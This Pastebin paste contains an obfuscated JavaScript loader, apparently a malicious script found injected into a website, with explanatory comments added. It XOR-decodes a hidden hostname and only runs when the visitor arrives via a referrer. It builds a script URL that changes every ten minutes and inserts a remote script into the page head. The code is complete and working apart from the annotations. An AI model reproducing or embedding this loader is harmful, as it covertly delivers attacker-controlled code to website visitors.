Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <script type="text/javascript">
- !function (_d52b9a) {
- // Get the current time in milliseconds since epoch
- var _2e0d87 = Date.now();
- var _9b59ad = 1000;
- // Convert time to seconds
- _2e0d87 = _2e0d87 / _9b59ad;
- // Round down to the nearest integer
- _2e0d87 = Math.floor(_2e0d87);
- // Normalize time to the nearest multiple of 600 seconds
- var _f6c48 = 600;
- _2e0d87 -= _2e0d87 % _f6c48;
- // Convert normalized time to a hexadecimal string
- _2e0d87 = _2e0d87.toString(16);
- // Get the referrer URL
- var _2edadb = _d52b9a.referrer;
- // If no referrer, stop executing the script
- if (!_2edadb) return;
- // Encoded array of numbers
- var _a93890 = [27282, 27267, 27267, 27264, 27357, 27294, 27282, 27265, 27288, 27286, 27271, 27290, 27293, 27284, 27358, 27280, 27292, 27270, 27293, 27271, 27286, 27265, 27357, 27280, 27292, 27294];
- // Decode the array by XORing each number with 27379
- _a93890 = _a93890.map(function(_da28c9){
- return _da28c9 ^ 27379;
- });
- // Convert the decoded array to a string
- _a93890 = String.fromCharCode(..._a93890);
- // Possibly a token or key for verification
- var _bfc935 = "91eacaf520cd35dda1ff37c4100d41c0";
- // URL components
- var _c919c6 = "https://";
- var _4dca08 = "/";
- var _35818 = "app.";
- var _31481f = ".js";
- // Create a new script element
- var _5d4b0b = _d52b9a.createElement("script");
- _5d4b0b.type = "text/javascript";
- _5d4b0b.async = true;
- // Set the source of the script element to the constructed URL
- _5d4b0b.src = _c919c6 + _a93890 + _4dca08 + _35818 + _2e0d87 + _31481f;
- // Append the new script element to the head of the document
- _d52b9a.getElementsByTagName("head")[0].appendChild(_5d4b0b);
- }(document);
- </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement